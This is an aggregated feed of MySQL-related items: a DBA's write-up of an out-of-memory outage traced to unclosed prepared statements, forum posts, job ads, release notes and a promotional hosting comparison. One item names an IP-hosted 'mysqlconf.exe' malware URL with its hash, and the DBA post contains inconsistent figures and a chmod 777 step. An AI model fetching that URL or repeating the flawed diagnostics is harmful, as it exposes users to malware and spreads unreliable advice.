Reduce MySQL Memory Utilization With ProxySQL Multiplexing was originally published in Searce Engineering on Medium, where people are continuing the conversation by highlighting and responding to this story.
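The multiplexing behaviour this post describes can be modelled with a toy Python pool. This is a sketch of the idea only, not ProxySQL's implementation: free backend connections are shared across all frontend clients, but a connection inside an open transaction stays pinned to its client until commit/rollback.

```python
# Toy model (not ProxySQL's code) of connection multiplexing.
class Pool:
    def __init__(self, size):
        self.free = list(range(size))    # backend connection ids
        self.pinned = {}                 # client -> backend conn held open

    def run(self, client, query, in_transaction=False):
        conn = self.pinned.pop(client, None)
        if conn is None:
            conn = self.free.pop()       # multiplexing: grab any free backend
        if in_transaction:
            self.pinned[client] = conn   # multiplexing disabled until commit/rollback
        else:
            self.free.append(conn)       # returned immediately for reuse
        return conn

pool = Pool(size=2)

# 100 autocommit queries from 100 different clients...
used = {pool.run(f"client{i}", "SELECT 1") for i in range(100)}
print(len(used))                         # ...all served by one backend connection

# An open transaction pins its backend, so another client gets a second one.
c = pool.run("tx-client", "BEGIN", in_transaction=True)
d = pool.run("other-client", "SELECT 1")
print(c != d)
```

This is why queries that disable multiplexing (open transactions, locked tables, SET/@ queries) inflate the backend connection count: each one pins a connection that autocommit traffic could otherwise share.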
          How max_prepared_stmt_count bring down the production MySQL system      Cache   Translate Page      
MySQL Adventures: How max_prepared_stmt_count can bring down production

We recently moved an on-prem environment to GCP for better scalability and availability. The customer's main database is MySQL. Due to the nature of the customer's business, it's a highly transactional workload (one of the hot startups in APAC). To deal with the scale and meet availability requirements, we deployed MySQL behind ProxySQL, which takes care of routing some of the resource-intensive SELECTs to chosen replicas.

The setup consists of:

One master
Two slaves
One archive database server

Post migration to GCP, everything was nice and calm for a couple of weeks, until MySQL decided to start misbehaving, leading to an outage. We were able to quickly resolve it and bring the system back online, and what follows are lessons from this experience.

The configuration of the database:

CentOS 7
MySQL 5.6
32-core CPU
120 GB memory
1 TB SSD for the MySQL data volume
Total database size of 40 GB (yes, it is small, but highly transactional)
my.cnf configured using Percona's configuration wizard
All tables use the InnoDB engine
No swap partitions

The Problem: It all started with an alert that said the MySQL process was killed by Linux's OOM killer. Apparently MySQL was rapidly consuming all the memory (about 120 GB), and the OOM killer perceived it as a threat to the stability of the system and killed the process. We were perplexed and started investigating.
Sep 11 06:56:39 mysql-master-node kernel: Out of memory: Kill process 4234 (mysqld) score 980 or sacrifice child
Sep 11 06:56:39 mysql-master-node kernel: Killed process 4234 (mysqld) total-vm:199923400kB, anon-rss:120910528kB, file-rss:0kB, shmem-rss:0kB
Sep 11 06:57:00 mysql-master-node mysqld: /usr/bin/mysqld_safe: line 183: 4234 Killed nohup /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sock < /dev/null > /dev/null 2>&1

Naturally, we started looking at the MySQL configuration to see if something was off.

InnoDB parameters:

innodb-flush-method = O_DIRECT
innodb-log-files-in-group = 2
innodb-log-file-size = 512M
innodb-flush-log-at-trx-commit = 1
innodb-file-per-table = 1
innodb-buffer-pool-size = 100G

Other caching parameters:

tmp-table-size = 32M
max-heap-table-size = 32M
query-cache-type = 0
query-cache-size = 0
thread-cache-size = 50
open-files-limit = 65535
table-definition-cache = 4096
table-open-cache = 50

We are not really using the query cache, and one of the heavy frontend services is PHP Laravel. Here is the memory utilization graph. The three highlighted areas are the points at which we had issues in production. The second issue happened very shortly after, so we reduced innodb-buffer-pool-size to 90 GB, but memory utilization still never came down. So we scheduled a cron job to flush the OS cache, at least to give some additional memory back to the operating system, using the following command. This was a temporary measure until we found the actual problem.

sync; echo 3 > /proc/sys/vm/drop_caches

But this didn't really help. Memory kept growing, and we had to look at what was really inside the OS cache.

Fincore: There is a tool called fincore that helped me find out what the OS cache actually held. It uses Perl modules; use the commands below to install it.
yum install perl-Inline
rpm -ivh http://fr2.rpmfind.net/linux/dag/redhat/el6/en/x86_64/dag/RPMS/fincore-1.9-1.el6.rf.x86_64.rpm

It never directly shows what files are inside the buffer/cache; instead we have to give it a path and it checks which files under that location are in the cache. I wanted to check the cached files for the MySQL data directory.

cd /mysql-data-directory
fincore -summary * > /tmp/cache_results

Here is a sample of the cached-file results:

page size: 4096 bytes
auto.cnf: 1 incore page: 0
dbadmin: no incore pages.
Eztaxi: no incore pages.
ibdata1: no incore pages.
ib_logfile0: 131072 incore pages: 0 1 2 3 4 5 6 7 8 9 10......
ib_logfile1: 131072 incore pages: 0 1 2 3 4 5 6 7 8 9 10......
mysql: no incore pages.
mysql-bin.000599: 8 incore pages: 0 1 2 3 4 5 6 7
mysql-bin.000600: no incore pages.
mysql-bin.000601: no incore pages.
mysql-bin.000602: no incore pages.
mysql-bin.000858: 232336 incore pages: 0 1 2 3 4 5 6 7 8 9 10......
mysqld-relay-bin.000001: no incore pages.
mysqld-relay-bin.index: no incore pages.
mysql-error.log: 4 incore pages: 0 1 2 3
mysql-general.log: no incore pages.
mysql.pid: no incore pages.
mysql-slow.log: no incore pages.
mysql.sock: no incore pages.
ON: no incore pages.
performance_schema: no incore pages.
mysql-production.pid: 1 incore page: 0

6621994 pages, 25.3 Gbytes in core for 305 files; 21711.46 pages, 4.8 Mbytes per file.

The highlighted points show the graph when the OS cache is cleared.

How we investigated this issue: The first document everyone refers to is "How MySQL Uses Memory" from MySQL's documentation. So we started with all the places where MySQL needs memory (I'll cover that in a different blog post). Let's continue with the steps we took.

Make sure MySQL is the culprit: Run the command below; it gives you the exact memory consumption of MySQL.
ps --no-headers -o "rss,cmd" -C mysqld | awk '{ sum+=$1 } END { printf ("%d%s\n", sum/NR/1024,"M") }'
119808M

Additional tips: If you want to know each MySQL thread's memory utilization, run the commands below.

# Get the PID of MySQL:
ps aux | grep mysqld

mysql 4378 41.1 76.7 56670968 47314448 ? Sl Sep12 6955:40 /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sock

# Get all threads' memory usage:
pmap -x 4378

4378: /usr/sbin/mysqld --basedir=/usr --datadir=/mysqldata --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --open-files-limit=65535 --pid-file=/var/run/mysqld/mysqld.pid --socket=/mysqldata/mysql.sock
Address           Kbytes     RSS   Dirty Mode  Mapping
0000000000400000   11828    4712       0 r-x-- mysqld
000000000118d000    1720     760     476 rw--- mysqld
000000000133b000     336     312     312 rw--- [ anon ]
0000000002b62000 1282388 1282384 1282384 rw--- [ anon ]
00007fd4b4000000   47816   37348   37348 rw--- [ anon ]
00007fd4b6eb2000   17720       0       0 ----- [ anon ]
00007fd4bc000000   48612   35364   35364 rw--- [ anon ]
...........................
00007fe1f0075000    2044       0       0 ----- libpthread-2.17.so
00007fe1f0274000       4       4       4 r---- libpthread-2.17.so
00007fe1f0275000       4       4       4 rw--- libpthread-2.17.so
00007fe1f0276000      16       4       4 rw--- [ anon ]
00007fe1f027a000     136     120       0 r-x-- ld-2.17.so
00007fe1f029c000    2012    2008    2008 rw--- [ anon ]
00007fe1f0493000      12       4       0 rw-s- [aio] (deleted)
00007fe1f0496000      12       4       0 rw-s- [aio] (deleted)
00007fe1f0499000       4       0       0 rw-s- [aio] (deleted)
00007fe1f049a000       4       4       4 rw--- [ anon ]
00007fe1f049b000       4       4       4 r---- ld-2.17.so
00007fe1f049c000       4       4       4 rw--- ld-2.17.so
00007fe1f049d000       4       4       4 rw--- [ anon ]
00007ffecc0f1000     132      72      72 rw--- [ stack ]
00007ffecc163000       8       4       0 r-x-- [ anon ]
ffffffffff600000       4       0       0 r-x-- [ anon ]
---------------- ------- ------- -------
total kB       122683392 47326976 47320388

InnoDB Buffer Pool: Initially we suspected the InnoDB buffer pool. We checked InnoDB usage in the monitoring system, but the result was negative: it never utilized more than 40 GB. That thickens the plot. If the buffer pool only has 40 GB, who is eating all that memory? Is this correct? Does the buffer pool really hold only 40 GB?

What's inside the buffer pool, and what is its size?

SELECT page_type AS page_type, sum(data_size) / 1024 / 1024 AS size_in_mb
FROM information_schema.innodb_buffer_page
GROUP BY page_type
ORDER BY size_in_mb DESC;

+-------------------+----------------+
| Page_Type         | Size_in_MB     |
+-------------------+----------------+
| INDEX             | 39147.63660717 |
| IBUF_INDEX        | 0.74043560     |
| UNDO_LOG          | 0.00000000     |
| TRX_SYSTEM        | 0.00000000     |
| ALLOCATED         | 0.00000000     |
| INODE             | 0.00000000     |
| BLOB              | 0.00000000     |
| IBUF_BITMAP       | 0.00000000     |
| EXTENT_DESCRIPTOR | 0.00000000     |
| SYSTEM            | 0.00000000     |
| UNKNOWN           | 0.00000000     |
| FILE_SPACE_HEADER | 0.00000000     |
+-------------------+----------------+

A quick guide to this query:

INDEX: B-tree index
IBUF_INDEX: insert buffer index
UNKNOWN: not allocated / unknown state
TRX_SYSTEM: transaction system data

Bonus: to get buffer pool usage by index:

SELECT table_name AS table_name, index_name AS index_name, count(*) AS page_count, sum(data_size) / 1024 / 1024 AS size_in_mb
FROM information_schema.innodb_buffer_page
GROUP BY table_name, index_name
ORDER BY size_in_mb DESC;

Then where was MySQL holding the memory? We checked all the places where MySQL utilizes memory. Here is a rough calculation of the memory utilization at the time of the crash:

BufferPool: 40GB
Cache/Buffer: 8GB
Performance_schema: 2GB
tmp_table_size: 32M
Open tables cache for 50 tables: 5GB
Connections, thread_cache and others: 10GB

That comes to almost 65 GB; call it roughly 70 GB out of 120 GB. But it is still only an approximation. Something is wrong, right? My DBA mind started to wonder: where is the rest? So far, MySQL is the culprit consuming all the memory. Clearing the OS cache never helped. Fine.
The buffer pool is also in a healthy state, and the other memory-consuming parameters look good. It's time to dive into MySQL. Let's see what kind of queries are running:

show global status like 'Com_%';

+-----------------------+-----------+
| Variable_name         | Value     |
+-----------------------+-----------+
| Com_admin_commands    | 531242406 |
| Com_stmt_execute      | 324240859 |
| Com_stmt_prepare      | 308163476 |
| Com_select            | 689078298 |
| Com_set_option        | 108828057 |
| Com_begin             | 4457256   |
| Com_change_db         | 600       |
| Com_commit            | 8170518   |
| Com_delete            | 1164939   |
| Com_flush             | 80        |
| Com_insert            | 73050955  |
| Com_insert_select     | 571272    |
| Com_kill              | 660       |
| Com_rollback          | 136654    |
| Com_show_binlogs      | 2604      |
| Com_show_slave_status | 31245     |
| Com_show_status       | 162247    |
| Com_show_tables       | 1105      |
| Com_show_variables    | 10428     |
| Com_update            | 74384469  |
+-----------------------+-----------+

The SELECT, INSERT and UPDATE counters look fine, but a huge number of prepared statements were running in MySQL.

One more tip: Valgrind. Valgrind is a powerful open source tool to profile a process's memory consumption by threads and child processes.

Install Valgrind:

# You need C compilers, so install gcc
wget ftp://sourceware.org/pub/valgrind/valgrind-3.13.0.tar.bz2
tar -xf valgrind-3.13.0.tar.bz2
cd valgrind-3.13.0
./configure
make
make install

Note: this is for troubleshooting purposes; you should stop MySQL and run it under Valgrind.

Create a log file to capture the output:

touch /tmp/massif.out
chown mysql:mysql /tmp/massif.out
chmod 777 /tmp/massif.out

Run MySQL with Valgrind:

/usr/local/bin/valgrind --tool=massif --massif-out-file=/tmp/massif.out /usr/sbin/mysqld --defaults-file=/etc/my.cnf

Wait for 30 minutes (or until MySQL takes up the whole memory), then kill Valgrind and start MySQL normally.

Analyze the log:

/usr/local/bin/ms_print /tmp/massif.out

We'll explain MySQL memory debugging with Valgrind in another blog post.
Memory leak: We had verified all the MySQL parameters and OS-level factors behind the memory consumption, with no luck. So I started to think about and search for known MySQL memory leaks, and found an excellent blog post by Todd. Yes, the only parameter I had not checked was max_prepared_stmt_count.

What is it? From MySQL's documentation:

This variable limits the total number of prepared statements in the server. It can be used in environments where there is the potential for denial-of-service attacks based on running the server out of memory by preparing huge numbers of statements.

Whenever we prepare a statement, we should close it when we are done; otherwise the memory allocated to it is never released. Executing a single query this way takes three steps (prepare, execute, close), and there is no visibility into how much memory a given prepared statement consumes.

Is this the real root cause? Run this query to check how many prepared statements are running on the server:

mysql> show global status like 'com_stmt%';

+-------------------------+-----------+
| Variable_name           | Value     |
+-------------------------+-----------+
| Com_stmt_close          | 0         |
| Com_stmt_execute        | 210741581 |
| Com_stmt_fetch          | 0         |
| Com_stmt_prepare        | 199559955 |
| Com_stmt_reprepare      | 1045729   |
| Com_stmt_reset          | 0         |
| Com_stmt_send_long_data | 0         |
+-------------------------+-----------+

You can see that 1045729 prepared statements are running, and the Com_stmt_close variable shows that none of the statements have been closed. This query returns the maximum allowed number of prepared statements:

mysql> show variables like 'max_prepared_stmt_count';
+-------------------------+---------+
| Variable_name           | Value   |
+-------------------------+---------+
| max_prepared_stmt_count | 1048576 |
+-------------------------+---------+

Oh — it was set to the maximum possible value for this parameter. We immediately reduced it to 2000.
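To make the failure mode concrete, here is a toy simulation of the server-side statement counter (illustrative code, not real client or server code): each prepare without a matching close pins memory until the cap is hit, which produces exactly the kind of error the application later throws.

```python
class PreparedStmtCounter:
    """Toy model of MySQL's server-side prepared-statement cap."""

    def __init__(self, max_prepared_stmt_count):
        self.cap = max_prepared_stmt_count
        self.open_statements = 0

    def prepare(self):
        if self.open_statements >= self.cap:
            raise RuntimeError(
                "Can't create more than max_prepared_stmt_count "
                f"statements (current value: {self.cap})"
            )
        self.open_statements += 1

    def close(self):
        self.open_statements -= 1


server = PreparedStmtCounter(max_prepared_stmt_count=2000)

# A leaky client: prepares on every query but never closes.
leaked = 0
try:
    for _ in range(3000):
        server.prepare()   # no matching server.close() -> memory stays pinned
        leaked += 1
except RuntimeError as err:
    print(err)

print("statements still open:", server.open_statements)
```

A well-behaved client calls close() after each execute, keeping the number of open statements flat no matter how many queries it runs.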
mysql> set global max_prepared_stmt_count=2000;

-- Add this to my.cnf as well
vi /etc/my.cnf

[mysqld]
max_prepared_stmt_count = 2000

Now MySQL is running fine and the memory leak is fixed; memory utilization has been normal ever since. The Laravel framework uses prepared statements almost everywhere — you can find many Laravel + prepared statement questions on Stack Overflow.

Conclusion: The most important lesson I learned as a DBA is this: before setting any parameter's value, check the consequences of modifying it and make sure it will not affect production. The MySQL side was now fine, but the application started throwing the error below:

Can't create more than max_prepared_stmt_count statements (current value: 20000)

To continue this series, the next blog post will explain how we fixed the above error using multiplexing, and how that helped dramatically reduce MySQL's memory utilization.

How max_prepared_stmt_count bring down the production MySQL system was originally published in Searce Engineering on Medium, where people are continuing the conversation by highlighting and responding to this story.
          moodle site crash after plugin installation      Cache   Translate Page      
by Γεώργιος Σάλαρης.  

Hello

I work on a Moodle platform and I tried to install a theme plugin. The installation was successful, but when I tried to update the database it got stuck, and since then I get the message that appears below.

My error log in cpanel shows the information as shown below.


I am kind of desperate because I tried some things I found here, for example deleting the theme folder. 

I also went through the file explorer and there is no such file as lib.php in the path /cache/lib.

I would appreciate every thought and help.

Thank you in advance.  


Moodle version is 2.9

PHP version 5.3.26

Apache version 2.4.29

MySql version 5.6.36 - 82.1


          185.231.155.180      Cache   Translate Page      
URL: 185.231.155.180/mysqlconf.exe, IP Address: 185.231.155.180, Country: RU, ASN: 48282, MD5: fac6ab167e1b02c2e1465ae88fb8fcdc
          Emails being sent to customers who are in the mysql?      Cache   Translate Page      

@Dez wrote:

How do you do it, so that emails get auto sent to customers at certain intervals (GDPR allowing)?

Their names and addresses would have been entered into the sql when they signed up as a customer.

Also, how do I add names and addresses manually to that sql db as well please?

Posts: 1

Participants: 1

Read full topic


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Mulesoft developer      Cache   Translate Page      
IN-Indianapolis, Position- Mulesoft Developer Location- Indianapolis IN Duration- Long Term contract Mulesoft Consultant with 10+ Years of experience. Mule Batch, JMS, CXF Web Services, SOAP and REST Web Services, Java, MySQL, Mule ESB, Anypoint Studio, Mule server 3.8.0, MMC, Jenkins, JIRA, Confluence, Kibana, GitHub, ForgeRock, Java 8, Spring, MUnit, ActiveMQ
          MySQL/PHP programmer      Cache   Translate Page      
General: We are an energy consultancy and run, among other things, an energy monitoring website for businesses. To renew this website we are looking for a good MySQL/PHP programmer who can think along with us. Tasks: - Replacing the old database with a new database (MySQL)...
          Medoo updated to 1.6, adding and optimizing several methods      Cache   Translate Page      

Medoo has jumped straight to version 1.6, with adjustments and optimizations to initialization and several methods. This release also adds a database-agnostic way to fetch random records. The highlights of this update are:

A. Improved initialization: Medoo 1.6 adds more connection options at initialization time, such as a collation option and an appname option for MSSQL. It also now allows initialization from a user-supplied PDO object.
B. A new API method, rand(), for fetching random data in a way that works across databases.
C. The info() method now includes the DSN string in its output, making it easy to inspect and debug the database connection information.
D. Improved behavior in some methods; for example, get() now returns NULL instead of False when no result is found.
E. Several bug fixes, e.g. the match keyword is no longer MySQL-only, and some issues with custom DSN connections were fixed.

Medoo is an ultra-lightweight PHP SQL database framework that provides a simple, easy-to-learn, flexible API to improve the efficiency and performance of web application development, in a single file of under 100 KB.

Medoo download: https://github.com/catfan/Medoo/archive/master.zip


          EXPERT Core PHP Developer for calling app at server level      Cache   Translate Page      
I'm looking for an expert core PHP developer who can work on the server side of a calling mobile app and add some technical features for the app at the server level in PHP. (Budget: ₹12500 - ₹37500 INR, Jobs: General Labor, Javascript, Mobile App Development, MySQL, PHP)
          I need two websites.      Cache   Translate Page      
Everything is to be done by you. I need amazing work in a short time; there is no limit on budget, but the turnaround must be as short as possible. I need only the best programmer. (Budget: €10000 - €20000 EUR, Jobs: MySQL, Software Architecture, Software Testing, Web Hosting, Website Testing)
          Episode 284: Buffalo Overflow | TechSNAP 284      Cache   Translate Page      

Massive drive failures after a datacenter gas attack. A critical MySQL vulnerability you should know about & is Cisco responsible for the death of an MMO?

Plus great questions, our answers & much more!

          Episode 224: Butterflies & Backronyms | TechSNAP 224      Cache   Translate Page      

The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin' roundup & much much more!

          AMTRON Recruitment 2018 : Systems Officer/ Systems Assistant [18 posts], Apply Online      Cache   Translate Page      
Assam Electronics Development Corporation Limited (AMTRON)
Last Date: 23/10/2018.


Assam Electronics Development Corporation Limited (AMTRON) invites applications from eligible candidates for engagement as Technical Manpower (Information Technology) on contract basis in various District and Sub-divisional Courts of Assam under 14th Finance Commission Grants. The employment is purely contractual in nature and the terms of contract shall come to an end on 31st March,2020.

1. Systems Officer
No of posts:
9
Educational Qualification: BE or B.Tech (Computer Science/Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation) or MCA or MSc(Computer Science/Information Technology/ Electronics & Communication /Electronics & Telecommunication / Electronics & Instrumentation/ Electronics & Electricals/Telecommunication/ Instrumentation)

Experience: 1 Year experience in software development in PHP/Java and Postgresql/MySQL environment, Android and IOS Mobile App development, Technical Troubleshooting & support in Hardware/Software implementation.

2. Systems Assistant
No of posts:
9
Educational Qualification: B.C.A or B.Sc. (Physics/Mathematics) with 1 year Post Graduate Diploma in Computer Science / Applications or DOECC `A` Level or Diploma holders (3 years) from Polytechnic in Computer Science/Engineering.

Experience: Knowledge in Server Administration/LAN/DBA/Technical troubleshooting support in Hardware.

Pay: The engagement is on monthly fixed pay basis including EPF contribution for the entire period of engagement. The breakup of pay and EPF is as shown below.

i) Systems Officer:
Monthly fixed pay: Rs. 15985.00
EPF Contributions per month: Rs. 3600.00

ii) Systems Assistant:
Monthly fixed pay: Rs. 10750.00
EPF Contributions per month: Rs. 2580.00
The EPF contributions shall be deposited to the individual EPF Accounts of the incumbents.

Selection Procedure: Online applications will be shortlisted on the basis of the eligibility criteria and list of such shortlisted candidates will be uploaded in the website www.amtron.in. The shortlisted candidates will be called for test/viva-voce through downloadable call letters. Selection Committee(s) will be constituted for test/viva-voce. Selection of the candidates will be done on the basis of their performance in test/viva-voce and experience. No TA/DA will be entertained for appearing in any test/viva-voce.

How to apply: Interested and eligible candidates may apply only online for the same, through the official website of the Corporation (www.amtron.in) from 09.10.2018 to 23.10.2018. A candidate can apply only ONLINE through website www.amtron.in. No other mode of application is acceptable. The online application can be uploaded following the typical steps as mentioned below:

• Visit www.amtron.in
• Click on the link Recruitment and then click Apply Online against this Notification
• Register yourself into the portal
• Login using your Registration No.
• Fill-up and submit the online application form

Important Dates :
Opening date for submission of online applications: 09/10/2018 10:00 AM
Last date for submission of online applications: 23/10/2018 11:59 PM
Uploading of the shortlist of candidates for test/viva-voce: To be notified later
For shortlisted candidates, downloading of call letter and date & venue of test/viva-voce will be informed later.

Advertisement Details: Please check here.

          aws Engineer|6-9 years|Hyderabad - Capgemini - Hyderabad, Telangana      Cache   Translate Page      
Experience with SQL and NoSQL DBs such as SQL, MySQL, Amazon DynamoDB. Hiring AWS Engineer with Certification and Solution Architect experience....
From Capgemini - Wed, 26 Sep 2018 05:22:40 GMT - View all Hyderabad, Telangana jobs
          MysqlToDB2      Cache   Translate Page      

MysqlToDB2 is a utility designed for instant data conversion. In particular, it converts MySQL databases to DB2, […]

Read MysqlToDB2


          WindowsASPNETHosting.in vs Square Brothers : Who is the Best ASP.NET Core 2.1.4 Hosting in India?      Cache   Translate Page      

Choosing an ASP.NET Core 2.1.4 Hosting service in India among thousands of providers can be a hard thing for the majority of webmasters at present. They already know that a bad hosting service coming with frequent downtime, security issues, and poor technical support can be a nightmare, but still find no way out for a quality option.

Both WindowsASPNETHosting.in and Square Brothers are highly popular in the Windows hosting field. WindowsASPNETHosting.in covers various web hosting services, such as Windows hosting, shared hosting, and performance hosting. On the other hand, Square Brothers, a professional web hosting provider in India, puts everything into offering a premium ASP.NET Core 2.1.4 hosting service. According to recent market research on ASP.NET (Windows) hosting, HostForLIFE.eu takes the more advantageous place.

How to Choose the Best ASP.NET Core 2.1.4 Hosting in India?

This time we would like to work out a comprehensive comparison of these web hosts to figure out whether WindowsASPNETHosting.in really has the strength to beat Square Brothers over the long term. After testing one hosting plan from each of the two providers, we compare WindowsASPNETHosting.in with Square Brothers on several aspects, including pricing, features, uptime, speed, and technical support. To begin with, please refer to the following rating table.

Additionally, they have many similarities and highlights, which can make choosing between them confusing. When it comes to choosing the right ASP.NET 5 hosting plan, price and usability are, to a great extent, what you take into consideration. In order to eliminate your confusion, we aim to work out an unbiased and constructive comparison between WindowsASPNETHosting.in and Square Brothers.

To complete this comparison, we have respectively run WindowsASPNETHosting.in and Square Brothers with our websites for months. After monitoring the two packages for months and reviewing thousands of users' comments, we completed the following in-depth comparison covering pricing, technical support, and other performance factors.

ASP.NET Core 2.1.4 Hosting Review on Price

Both of WindowsASPNETHosting.in and Square Brothers offer affordable plans.

http://windowsaspnethosting.in/
WindowsASPNETHosting.in
Square Brothers

ASP.NET Core 2.1.4 Hosting Review on Feature

The two plans both have rich features to help you manage websites efficiently and effectively. WindowsASPNETHosting.in provides high-quality, affordable Windows hosting services in India for individuals and companies of all sizes. Host your website with an innovative, reliable, and friendly Indian Windows hosting company that cares about your business. To be exact, WindowsASPNETHosting.in, with the latest ASP.NET framework and excellent ASP components, offers you many tools to run sites smoothly. One of the main strengths of its Classic plan is one-click installs for apps like WordPress, Drupal, and Zen Cart. Moreover, it carries many of the latest server technologies, including PHP 5.6.13 and MySQL 5.7. 
WindowsASPNETHosting.in Features
Square Brothers's Windows web hosting plans start with a minimum of 5000 MB disk space and 20000 MB bandwidth. All their Windows hosting plans come with a great control panel, the fastest control panel for managing your hosting account. You can run both ASP and PHP websites, with support for ASP.NET, Crystal Reports, MSSQL, and MySQL. 

Review on Performance

Having offered ASP.NET Core 2.1.4 hosting for years, WindowsASPNETHosting.in has earned trust and popularity from thousands of webmasters. This company powers its US-based and India-based data centers with high-performance network infrastructure and servers, redundant connections, and a handprint entry system. Therefore, WindowsASPNETHosting.in can deliver fast network speed and more than 99.9% uptime. Square Brothers likewise strives for 99.9% uptime; the company has a staff of 300 employees, more than 1.5 million active services, and over 275,000 clients.

Review on Technical Support

In terms of customer service, both WindowsASPNETHosting.in and Square Brothers promise friendly and professional support via email, available 24 hours a day, 7 days a week. The two companies each have a team of experienced, professional technical staff who can offer immediate assistance whenever you need it. Besides, WindowsASPNETHosting.in maintains many useful resources in its knowledge base, which can help if you want to pick up basic skills and information for building and managing your website.

WindowsASPNETHosting.in is The Best & Cheap Windows Hosting in India

Based on our all-around comparison above, we have found that both WindowsASPNETHosting.in and Square Brothers are generally good choices. After several days of reviewing a large number of web hosting companies, we recommend WindowsASPNETHosting.in, which offers cost-effective shared hosting plans in India. 
http://windowsaspnethosting.in/ASPNET-Shared-Hosting-Plans-India

          Java & PHP Programmer      Cache   Translate Page      
Ho Chi Minh City - - Has experience/knowledge of the programming languages JAVA, C#, PHP, JavaScript. - Experienced with HTML5, CSS, jQuery, Bootstrap..., CodeIgniter - Works with the database systems MySQL, Postgres, MSSQL. - Skilled in object-oriented programming - Has experience building Socket applications...
          Back-end Developer - R&D - Tundra Technical - Saint-Roch, QC      Cache   Translate Page      
Programming in C#, MySQL, XML, Node.js, HTML, JS, REST. Back-End Developer – R&D....
From Indeed - Thu, 30 Aug 2018 14:50:49 GMT - View all Saint-Roch, QC jobs
          Website Redesign and Development - Upwork      Cache   Translate Page      
I am looking for the redesign and development of my current website. The website is: http://innoviusmigration.com/. The website has 2 main sections
http://au.innoviusmigration.com/
http://nz.innoviusmigration.com/
au.innoviusmigration is set as the default home page.
I am looking for a new, conversion-focused, modern, high-end, fully responsive, professional website with customized design and coding. The live chat feature will not be in the new website.
The content of the website will remain almost the same. Please note that there are 2 main sections for 2 different countries. The design and layout will remain almost the same, with the only difference being the content.

Apart from the website, I am also looking for landing page for each of the above 2 sections.

Your quotation should include the following:
1) Price for the project
2) Timeline for the project. I am strictly looking to complete the project on time.
3) 10 best projects you have done. If you are a company, send me the projects of your staff who will be working on my project.
4) Years of work experience in website design and development.
You quotation will not be considered without the above.

Budget: $500
Posted On: October 10, 2018 05:48 UTC
ID: 214414970
Category: Web, Mobile & Software Dev > Web Development
Skills: AngularJS, CSS, CSS3, HTML, HTML5, JavaScript, jQuery, MySQL Administration, PHP, Web Design, Website Development, WordPress
Country: Australia
click to apply
          Paulo Talin - Travel Agency Website      Cache   Translate Page      
I need a Travel Agency website with checking or booking system - optional online purchase - marketplace/split system (by service provider option/contract) or client charging by service supplier after approved checking or booking... (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Add a feature to ownCloud      Cache   Translate Page      
I have ownCloud installed on my server. Now I would like to connect my various Onedrive for Business accounts with my ownCloud and mount them as external storage. It should be possible to access Onedrive from my ownCloud and also be able to move or delete files... (Budget: €8 - €30 EUR, Jobs: Apache, Javascript, Linux, MySQL, PHP)
          binlog incomplete.Missing some databases's record (no replies)      Cache   Translate Page      
In mysql-audit.log we found some records about c_bet, but we couldn't find any record containing "c_bet" in any of the binlog files.
Could anyone help me with this? I couldn't find any clue on the internet.
Posting a message here is my last hope...

here is my.cnf:
[mysqld]
symbolic-links=0
innodb_buffer_pool_size=4G
key_buffer_size=1G
max_connections=3000
max_connect_errors=100
expire_logs_days=30
log-bin = /binlog/mysql-bin
skip-name-resolve
basedir=/usr/local/mysql
datadir=/mysql/data
port = 3306
server_id=117
socket=/tmp/mysql.sock
sql_mode=""
# mysql-audit
plugin-load=AUDIT=libaudit_plugin.so
audit_validate_checksum=ON
audit_json_file=ON
audit_uninstall_plugin=ON
audit_offsets=7800, 7848, 3624, 4776, 456, 360, 0, 32, 64, 160, 536, 7964
# absolute path of the audit log file
audit_json_log_file=/tmp/mysql-audit-3306.log
# commands to audit
audit_record_cmds= drop,alter,update,delete,insert
[mysql]
socket=/tmp/mysql.sock


This is the master, and on the slave I run the "show slave status \G" command; it shows that master-slave replication is OK.

I would really appreciate it if you could help.
          Sluggish replication; Linux Kernel 4.15.0-36 (1 reply)      Cache   Translate Page      
OS: Ubuntu 16.04.03 x64
MySQL: 5.7.23-community (MySQL ppa repo)

Anyone else running Ubuntu 16.04.3 with kernel 4.15.0-36-generic and having sluggish replication performance?

We have a MySQL farm of seven servers, all running Ubuntu on dedicated hardware. Ubuntu released kernel 4.15.0-36-generic last week and we rebooted this last weekend. Replication has been falling steadily behind since the reboot. There was no reason for it that we could see. The servers were not choking under any load; network, storage, or CPU. Servers on the same network switch were up to hours behind in replication. This was something new. We have never really had a significant lag before - usually a minute or so was the worst we ever had. But hours?

There were no MySQL or OS configurations changes. All servers were updated to MySQL 5.7.23 on 2018-08-08 and have been running fine since that update.

The biggest indicator of the lag was "SLAVE RETRIEVED". It was way behind. "SLAVE EXECUTED" was keeping up but "SLAVE RETRIEVED" seem to not be downloading transactions from the upstream host with any urgency.

Long story short, we eliminated the physical network and concluded it had to be an OS update. We restarted one server using kernel 4.15.0-34-generic and it caught up on replication in just a couple of minutes!
          Junior Web Developer - Chalandri      Cache   Translate Page      
Intelligent Media, a media technologies company based at Chalandri - Athens, is seeking a full-time female Junior Web Developer for its idcs (idcs.gr) Business Unit. Job Description: Handling of first- and second-level support for an online loyalty club platform developed and operated on behalf of a multinational company Participation in various web development projects Job Requirements: Knowledge and proven work experience (at least 1 year), focused on PHP programming and HTML5, CSS3, JavaScript, AJAX/JSON, MySQL/MariaDB Experienced in CMS development...
